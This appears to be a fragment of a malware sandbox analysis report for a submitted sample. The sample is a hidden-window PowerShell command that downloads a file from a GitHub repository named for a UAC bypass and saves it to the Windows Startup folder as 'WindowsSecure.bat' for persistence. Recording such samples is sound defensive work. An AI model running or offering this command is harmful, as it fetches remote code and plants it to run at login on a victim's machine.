Static task

static1

URLScan task

urlscan1

Behavioral task

behavioral1

Sample

http://powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://raw.githubusercontent.com/xjnhzaj12b1/iscsicpl_bypassUAC/main/st -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsSecure.bat";

Resource

win10v2004-20230703-en